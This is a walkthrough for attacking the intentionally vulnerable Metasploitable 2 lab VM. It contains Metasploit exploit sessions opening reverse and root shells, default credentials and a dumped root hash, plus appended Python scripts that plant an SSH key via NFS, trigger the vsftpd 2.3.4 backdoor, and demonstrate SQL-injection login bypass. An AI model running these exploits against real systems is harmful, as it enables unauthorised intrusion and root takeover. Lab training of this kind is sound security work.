Metasploitable 2 is a deliberately vulnerable Linux installation: an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. The image can be downloaded from https://information.rapid7.com/download-metasploitable-2017.html. For details beyond what is covered in this article, please check the Metasploitable 2 Exploitability Guide; what is currently missing from that documentation is the web server and web application flaws, and the vulnerabilities that allow a local user to escalate to root privileges. A video tutorial on installing Metasploitable 2 is also available.

In addition to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. Beyond the system-level accounts (msfadmin/msfadmin is the documented login), the PostgreSQL service can be accessed with username postgres and password postgres, the MySQL service is open to root with an empty password, and the Tomcat manager accepts tomcat/tomcat.

Lab setup

The environment used in this walkthrough: a 64-bit Kali Linux attacker at 192.168.127.159 running the Metasploit Framework, and the 32-bit Metasploitable 2 target at 192.168.127.154. The purpose of the accompanying video is to build this virtual networking environment for learning ethical hacking with the Metasploit Framework that ships with Kali Linux.

Creating the virtual machine:

Step 1: Type the virtual machine name (Metasploitable-2) and set the Type to Linux.
Step 5: Select your virtual machine and click the Settings button.

Once Metasploitable is installed, log in as msfadmin with password msfadmin. The console greets you with:

    Warning: Never expose this VM to an untrusted network!

    Contact: msfdev[at]metasploit.com

    Login with msfadmin/msfadmin to get started

    metasploitable login:

After logging in, the kernel and distribution notice read:

    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the

Depending on the order in which the guest operating systems are started, the IP address of Metasploitable 2 will vary, so check the target's network interface and take note of its inet address. This is the address you will use for testing.

The Metasploit Framework is the most widely used exploitation framework; it is also instrumental in Intrusion Detection System signature development. Once you open the Metasploit console you get the msf > prompt; the interface looks like a Linux command-line shell.

Scanning and enumeration

First we need to list what services are visible on the target. The nmap command uses a few flags to conduct the initial scan; once we have a clear picture of the open ports we enumerate each one to identify the running service and its version. We will work through the FTP, telnet and SSH services and then the rest.

A Nessus scan (Nessus is a network vulnerability scanner) of Metasploitable reported over 60 vulnerabilities, similar to the ones found on the Windows target; among other things it exposed the TWiki web application's remote code execution flaw, exploited below.

One thing worth knowing when reading scan output: TCP Wrapper is a host-based network access control system used in operating systems such as Linux and BSD to filter network access to Internet Protocol (IP) servers.

Port 1524 (ingreslock) was a popular choice a decade ago for adding a backdoor to a compromised server.

Telnet (port 23)

Telnet is inherently insecure: it transmits everything, credentials included, in plain text. The telnet_version scanner grabs the banner, which on Metasploitable 2 is the same ASCII-art login screen shown above:

    msf > use auxiliary/scanner/telnet/telnet_version
    msf auxiliary(telnet_version) > show options

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RPORT  23               yes       The target port

    [*] 192.168.127.154:23 TELNET <metasploitable2 ASCII-art banner> Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started metasploitable login:
    [*] Auxiliary module execution completed

NFS (port 2049)

NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of registered services; you will need the rpcbind and nfs-common Ubuntu packages to follow along. The example uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. Because SSH is also running, that is enough for a root login: generate a new SSH key on the attacking system, mount the NFS export, and add the public key to the root account's authorized_keys file, then ssh in as root.

vsftpd 2.3.4 backdoor (port 21)

On port 21, Metasploitable 2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. Metasploit's vsftpd_234_backdoor module triggers it and connects to the shell it spawns on port 6200:

    msf > use exploit/unix/ftp/vsftpd_234_backdoor
    msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
    RHOST => 192.168.127.154
    msf exploit(vsftpd_234_backdoor) > show options

    Module options (exploit/unix/ftp/vsftpd_234_backdoor):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.127.154  yes       The target address

    Exploit target:

       Id  Name
       --  ----
       0   Automatic Target

    msf exploit(vsftpd_234_backdoor) > exploit
    [*] Banner: 220 (vsFTPd 2.3.4)
    [*] USER: 331 Please specify the password.
    [+] Backdoor service has been spawned, handling...
    [*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2021-02-06 22:42:36 +0300

Samba username map script (port 445)

Initially, to get the server version, we use an auxiliary module; with that information in hand we pick the appropriate exploit, Samba username map script Command Execution. A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module when the non-default Username Map Script configuration option is in use:

    msf > use exploit/multi/samba/usermap_script
    msf exploit(usermap_script) > set RHOST 192.168.127.154
    RHOST => 192.168.127.154
    msf exploit(usermap_script) > set RPORT 445
    RPORT => 445
    msf exploit(usermap_script) > show options

    Module options (exploit/multi/samba/usermap_script):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.127.154  yes       The target address

    msf exploit(usermap_script) > show payloads

    Compatible Payloads
       cmd/unix/interact  normal  Unix Command, Interact with Established Connection

    msf exploit(usermap_script) > exploit
    [*] Started reverse double handler
    [*] Accepted the first client connection
    [*] Command: echo qcHh6jsH8rZghWdi;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from socket B
    [*] B: "VhuwDGXAoBmUMNcg\r\n"
    [*] Matching

UnrealIRCd 3.2.8.1 backdoor (port 6667)

The IRC daemon is the backdoored UnrealIRCd 3.2.8.1 release (UnrealIRCD 3.2.8.1 Backdoor Command Execution). The module's cmd/unix/reverse payload uses the same double handler:

    msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
    msf exploit(unreal_ircd_3281_backdoor) > exploit
    [*] Started reverse double handler
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    [*] Command: echo 7Kx3j4QvoI7LOU5z;
    [*] Writing to socket A
    [*] Reading from socket B
    [*] B: "D0Yvs2n6TnTUDmPF\r\n"
    [*] Matching

distcc (port 3632)

The distcc daemon can be made to run arbitrary commands (exploit/unix/misc/distcc_exec); its options were reviewed with:

    msf exploit(distcc_exec) > show options

Several of these exploits leave us with a low-privilege shell. That is fine: we can progress to root through the udev exploit, as demonstrated later.

MySQL (port 3306) and PostgreSQL (port 5432)

You can connect to the remote MySQL database server using an account that is not password-protected. Let's see if we can really connect to the database as root without a password:

    Welcome to the MySQL monitor.
    Oracle is a registered trademark of Oracle Corporation and/or its affiliates.
    Type 'help;' or '\h' for help.

The Metasploit postgres_login scanner confirms the default PostgreSQL credentials:

    msf > use auxiliary/scanner/postgres/postgres_login
    msf auxiliary(postgres_login) > show options

       Name             Current Setting                                                           Required  Description
       ----             ---------------                                                           --------  -----------
       DATABASE         template1                                                                 yes       The database to authenticate against
       DB_ALL_PASS      false                                                                     no        Add all passwords in the current database to the list
       PASSWORD                                                                                   no        The Password for the specified username
       RHOSTS                                                                                     yes       The target address range or CIDR identifier
       STOP_ON_SUCCESS  false                                                                     yes       Stop guessing when a credential works for a host
       THREADS          1                                                                         yes       The number of concurrent threads
       USER_FILE        /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt   no        File containing users, one per line

    msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    [*] 192.168.127.154:5432 Postgres - Disconnected
    [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

So, as before with MySQL, it is possible to log into this database. We also checked Metasploit's exploits and discovered one that takes this further: the postgres account may write to the /tmp directory on some standard Linux installations of PostgreSQL and load UDF shared libraries from there, enabling arbitrary code execution.

Tomcat manager (port 8180) and Java RMI (port 1099)

The Tomcat manager application accepts the default tomcat/tomcat credentials, so tomcat_mgr_deploy can upload a WAR file carrying a Java Meterpreter:

    msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
    USERNAME => tomcat
    msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
    PASSWORD => tomcat
    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
    LHOST => 192.168.127.159
    msf exploit(tomcat_mgr_deploy) > exploit
    [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300

Searching for exploits for Java turned up something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Its options include a local listener from which the target loads the payload class, and on launch it reports that the exploit request was sent:

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host to listen on.
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

    [*] Successfully sent exploit request

TWiki (port 80)

The Nessus scan exposed the TWiki web application to remote code execution (TWiki History TWikiUsers rev Parameter Command Execution):

    msf > use exploit/unix/webapp/twiki_history
    msf exploit(twiki_history) > show options

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       URI    /twiki/bin       yes       TWiki bin directory path
       VHOST                   no        HTTP server virtual host

    msf exploit(twiki_history) > set payload cmd/unix/reverse
    payload => cmd/unix/reverse

Privilege escalation: udev netlink (CVE-2009-1185)

We're going to use this exploit: udev before 1.4.1 does not verify whether a NETLINK message comes from kernel space, allowing local users to obtain privileges by sending a NETLINK message from user space.

We're on 64-bit Kali and the target is 32-bit, so we compile the exploit specifically for 32-bit. From the victim we change to /tmp/ and fetch the exploit from the attacking machine. The exploit takes the udevd netlink socket PID (listed in /proc/net/netlink, typically the udevd PID minus 1) as argv[1], and executes /tmp/run as root, so put any payload you want in /tmp/run. Confirm that the PID is the right one by looking at the udev service:

    $ cat /proc/net/netlink
    df8cc200 15 2767 00000001 0 0 00000000 2
    $ ps aux | grep udev
    (udevd is PID 2768)

It seems to be the right one (2768 - 1 = 2767). The payload in /tmp/run sets the SUID bit on the rootme binary with chmod 4755 rootme, and running it gives a root shell. We can now read the password hashes and everything else:

    root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.

The udev exploit is also available in Metasploit (exploit/linux/local/udev_netlink), so we exploit the very same vulnerability from inside Metasploit this time, starting from one of the low-privilege sessions obtained above:

       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

    [*] Meterpreter session, using get_processes to find netlink pid
    [+] Found netlink pid: 2769
    [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb

The same exploit that we ran manually before is very simple and quick in Metasploit. Later sections that need root simply reuse this step.

Web applications

There are a number of intentionally vulnerable web applications included with Metasploitable 2; to access one, click its link on the landing page. In the current version as of this writing, the applications include Mutillidae and TWiki, both used in this article.

Mutillidae

Let's begin by pulling up the Mutillidae homepage. Notice that the Security Level is set to 0, Hints is also set to 0, and the user is not logged in. The menu also lets you toggle PHPIDS (PHP Intrusion Detection System) on and off, and there is a Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. Information about each OWASP vulnerability can be found under the menu on the left.

For our first example we toggled Hints to 1 and selected A1 - Injection -> SQLi Bypass Authentication -> Login. Trying the SQL injection method of entering OR 1=1 into the Name field, as described in the hints, gave errors. This turns out to be due to a minor, yet crucial, configuration problem that impacts any database-related functionality.

Mutillidae's own per-page hints list what each page is vulnerable to, including:

- This is the action page.
- SQL injection and XSS via the username, signature and password fields.
- Contains directories that are supposed to be private.
- This page gives hints about how to discover the server configuration.
- Cascading style sheet injection and XSS via the color field.
- Denial of service if you fill up the log.
- XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields.
- XSS via the User-Agent string HTTP header.
- SQLi and XSS on the log are possible.
- GET for POST is possible because reading only POSTed variables is not enforced.
- Loading of any arbitrary web page on the Internet, or locally, including the site's password files.
- Phishing.
- SQL injection to dump all usernames and passwords via the username field or the password field.
- XSS via any of the displayed fields; they are input on the add-to-your-blog page.
- XSS via the logged-in user name and signature.
- The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1.
- DOM injection on the add-key error message, because the key entered is output into the error message without being encoded.
- You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.
- You can SQL inject the UID cookie value because it is used to do a lookup.
- You can change your rank to admin by altering the UID value.
- HTTP response splitting via the logged-in user name, because it is used to create an HTTP header.
- This page is responsible for cache control but fails to do so.
- This page allows the X-Powered-By HTTP header.
- HTML comments.
- There are secret pages that, if browsed to, will redirect the user to the phpinfo.php page.

VNC (port 5900)

This method is used to exploit VNC software hosted on Linux, Unix or Windows operating systems with an authentication weakness; once connected, the viewer reports the negotiated Pixel format.

Related reading

- Pentesting Vulnerabilities in Metasploitable (part 1)
- How To install NetHunter Rootless Edition
- Exploiting All Remote Vulnerability In Metasploitable - 2
- Tip: How to use Metasploit commands and exploits for pen tests, by Ed Moyle, Drake Software. These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. "Nowhere is the adage 'seeing is believing' more true than in cybersecurity."
- Andrea Fortuna
- CVE-2017-5231

Do you have any feedback on the above examples?
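The NFS section above describes the root-export-to-root-shell path in prose. The following is an added example (not the page's own commands and not Metasploit code) that scripts it in Python: enumerate with rpcinfo and showmount, mount the export, plant our public key for root, unmount. TARGET, MOUNT and the key path are lab assumptions. The reusable piece, plant_key(), works on any directory tree, and it only succeeds against the real target because the export lets the client's root write to it, which is what the walkthrough relies on.

```python
"""Mount the target's NFS root export and add our SSH key for root.

Added example, not the page's own commands or Metasploit code. TARGET,
MOUNT and PUBKEY are lab assumptions. plant_key() is the reusable part: it
works on any directory tree, so it can be exercised without NFS at all.
"""
import os
import subprocess
import tempfile

TARGET = "192.168.127.154"                          # assumed Metasploitable 2 address
MOUNT = "/mnt/nfs"                                  # assumed local mount point
PUBKEY = os.path.expanduser("~/.ssh/id_rsa.pub")    # assumed key generated on the attacker


def plant_key(root_dir, pubkey_line):
    """Append one public key to <root_dir>/root/.ssh/authorized_keys.

    Idempotent: a key already present is not added again. Directory and
    file modes are set to 700/600 so sshd's StrictModes check accepts them.
    Returns True when the key was added, False when it was already there.
    """
    key = pubkey_line.strip()
    ssh_dir = os.path.join(root_dir, "root", ".ssh")
    os.makedirs(ssh_dir, exist_ok=True)
    os.chmod(ssh_dir, 0o700)
    path = os.path.join(ssh_dir, "authorized_keys")
    existing = []
    if os.path.exists(path):
        with open(path) as fh:
            existing = [line.strip() for line in fh]
    if key in existing:
        return False
    with open(path, "a") as fh:
        fh.write(key + "\n")
    os.chmod(path, 0o600)
    return True


def selfcheck():
    """Exercise plant_key in a scratch tree; returns (added, added_again, mode)."""
    with tempfile.TemporaryDirectory() as tree:
        first = plant_key(tree, "ssh-ed25519 AAAAexamplekey kali\n")   # constructed key
        second = plant_key(tree, "ssh-ed25519 AAAAexamplekey kali")    # same key again
        mode = os.stat(os.path.join(tree, "root", ".ssh", "authorized_keys")).st_mode & 0o777
    return first, second, mode


def main():
    """The attack path: enumerate, mount, plant the key, unmount, then ssh."""
    subprocess.run(["rpcinfo", "-p", TARGET], check=True)     # is nfs registered with the portmapper?
    subprocess.run(["showmount", "-e", TARGET], check=True)   # expect "/" in the export list
    os.makedirs(MOUNT, exist_ok=True)
    subprocess.run(["mount", "-t", "nfs", f"{TARGET}:/", MOUNT], check=True)
    try:
        with open(PUBKEY) as fh:
            plant_key(MOUNT, fh.read())
    finally:
        subprocess.run(["umount", MOUNT], check=True)
    print(f"now: ssh root@{TARGET}")


if __name__ == "__main__":
    main()
```

main() needs root on the attacker (mount) and the rpcbind/nfs-common tools the section mentions; selfcheck() runs anywhere and shows that a second run does not duplicate the key, which matters when you rerun the script after a failed login.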
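For the vsftpd 2.3.4 backdoor above, here is an added Python example (not from the page and not Metasploit's vsftpd_234_backdoor module) that does what the module's transcript shows: check the 220 banner for the exact backdoored version, send the trigger in the USER command, then connect to port 6200 and confirm the shell answers `id`. The target address is an assumption; the trigger (a username containing ":)") and the 6200 listener are the documented behaviour of that backdoor.

```python
"""Check for, and trigger, the vsftpd 2.3.4 backdoor.

Added example; not code from the page or from Metasploit. TARGET is an
assumption. A USER value containing ":)" makes this build open a root
shell listener on TCP 6200, the port the Metasploit session connects to.
"""
import re
import socket
import time

TARGET = "192.168.127.154"   # assumed Metasploitable 2 address
BACKDOOR_PORT = 6200
TRIGGER = b":)"


def banner_is_vulnerable(banner):
    """True when the FTP greeting is exactly the backdoored 2.3.4 release."""
    m = re.match(rb"220 \(vsFTPd ([0-9.]+)\)", banner.strip())
    return m is not None and m.group(1) == b"2.3.4"


def trigger_command(user="x"):
    """USER line that trips the backdoor; the username itself is arbitrary."""
    return b"USER " + user.encode() + TRIGGER + b"\r\n"


def probe(host=TARGET, port=21, timeout=5.0):
    """Send the trigger, then see whether port 6200 answers `id` with a uid.

    Returns the shell's reply as bytes, or None when the banner is not
    2.3.4 or the listener did not appear.
    """
    with socket.create_connection((host, port), timeout=timeout) as ftp:
        banner = ftp.recv(1024)
        if not banner_is_vulnerable(banner):
            return None
        ftp.sendall(trigger_command())
        ftp.recv(1024)                        # "331 Please specify the password."
        ftp.sendall(b"PASS whatever\r\n")     # reply not needed; the listener is already up
        time.sleep(1)
        try:
            shell = socket.create_connection((host, BACKDOOR_PORT), timeout=timeout)
        except OSError:
            return None
    with shell:
        shell.sendall(b"id\n")
        reply = shell.recv(4096)
    return reply if b"uid=" in reply else None


if __name__ == "__main__":
    print(probe())
```

Matching the version exactly rather than "any vsFTPd" is deliberate: later releases print a similar banner and are not backdoored, and a scanner that fires the trigger against them just wastes a connection.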
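The udev section above says the exploit wants the udevd netlink socket PID from /proc/net/netlink, "typically the udevd PID minus 1", and checks it by hand against ps. This added Python example (not the exploit and not Metasploit's udev_netlink module) automates that check: it parses /proc/net/netlink for user-space sockets on the uevent protocol and cross-checks them against running udevd processes. The sample inputs are constructed around the one netlink row and udevd PID the walkthrough shows (2767 and 2768).

```python
"""Locate the udevd netlink socket PID that the udev exploit takes as argv[1].

Added example; not the exploit itself and not Metasploit's udev_netlink
module. SAMPLE_NETLINK and SAMPLE_PS are constructed around the one
/proc/net/netlink row and udevd PID the walkthrough shows (2767 and 2768);
on a real target read /proc/net/netlink and `ps aux` output instead.
"""
import re

NETLINK_KOBJECT_UEVENT = 15   # netlink protocol carrying kernel uevents (the "Eth" column)

# Constructed: header plus three sockets. Pid 0 rows are the kernel's own sockets.
SAMPLE_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df8d8000 0   0      00000000 0        0        00000000 2
df8cc200 15  2767   00000001 0        0        00000000 2
df8cc400 15  0      00000000 0        0        00000000 2
"""

# Constructed `ps aux | grep udev` output: udevd is PID 2768.
SAMPLE_PS = """\
root      2768  0.0  0.1   2216   740 ?        S<s  Jan01   0:00 /sbin/udevd --daemon
msfadmin  3101  0.0  0.0   3004   776 pts/0    S+   Jan01   0:00 grep udev
"""


def uevent_socket_pids(netlink_text):
    """Return the port ids of user-space sockets bound to NETLINK_KOBJECT_UEVENT."""
    pids = []
    for line in netlink_text.splitlines()[1:]:          # skip the header row
        cols = line.split()
        if len(cols) < 3:
            continue
        eth, pid = int(cols[1]), int(cols[2])
        if eth == NETLINK_KOBJECT_UEVENT and pid != 0:  # pid 0 is the kernel side
            pids.append(pid)
    return pids


def udevd_pids(ps_text):
    """Return PIDs of udevd processes from `ps aux` style text (ignores the grep line)."""
    return [int(line.split()[1]) for line in ps_text.splitlines()
            if re.search(r"\budevd\b", line)]


def pick_netlink_pid(netlink_text, ps_text):
    """Pick the netlink pid to pass to the exploit.

    udevd binds its uevent socket before it forks into the background, so
    the socket's port id is usually the daemon's PID minus one. Prefer a
    candidate that lines up with a running udevd that way; otherwise fall
    back to the first candidate, or None when there is none.
    """
    candidates = uevent_socket_pids(netlink_text)
    daemons = set(udevd_pids(ps_text))
    for pid in candidates:
        if pid + 1 in daemons or pid in daemons:
            return pid
    return candidates[0] if candidates else None


if __name__ == "__main__":
    print(pick_netlink_pid(SAMPLE_NETLINK, SAMPLE_PS))   # 2767 for the sample data
```

On a box with several netlink sockets on protocol 15 (desktop sessions run their own uevent listeners) the cross-check against ps is what keeps you from handing the exploit the wrong port id.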
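The Mutillidae "SQLi Bypass Authentication" lesson above hints at entering OR 1=1 into the Name field. This added Python example (not from the page and not Mutillidae's code) shows why that works and what the fix is: login_vulnerable() builds the query from the Name and Password fields the way such a login page does, login_safe() is the same query with bound parameters. The accounts table is constructed; the leading quote and the trailing comment in the injected string are what make the bypass work, which the abbreviated hint leaves out.

```python
"""SQL-injection login bypass (Mutillidae's "SQLi Bypass Authentication" lesson).

Added example, not code from the page or from Mutillidae. The accounts
table is constructed. login_vulnerable() builds SQL from the Name and
Password fields the way the lesson's page does; login_safe() is the fix.
"""
import sqlite3

# What you type in the Name field: the quote closes the string literal,
# OR 1=1 makes the WHERE clause true for every row, and the comment
# discards the password check that follows.
BYPASS = "' OR 1=1 -- "


def make_db():
    """In-memory stand-in for the application's accounts table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts(username TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                   [("admin", "adminpass", 1), ("john", "monkey", 0)])
    return db


def login_vulnerable(db, name, password):
    """String-built query: attacker input becomes part of the SQL text."""
    sql = (f"SELECT username FROM accounts WHERE username='{name}' "
           f"AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, name, password):
    """Same query with bound parameters: input is data, never SQL."""
    row = db.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (name, password)).fetchone()
    return row[0] if row else None


def demo():
    """Returns (vuln_with_bypass, safe_with_bypass, safe_valid, vuln_valid)."""
    db = make_db()
    return (login_vulnerable(db, BYPASS, "anything"),
            login_safe(db, BYPASS, "anything"),
            login_safe(db, "john", "monkey"),
            login_vulnerable(db, "john", "monkey"))


if __name__ == "__main__":
    print(demo())   # ('admin', None, 'john', 'john')
```

The injected query becomes `... WHERE username='' OR 1=1 -- ' AND password='anything'`, so the first row, the admin account, is returned without a password. With parameters bound, the same string is just a username nobody has, and login fails.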
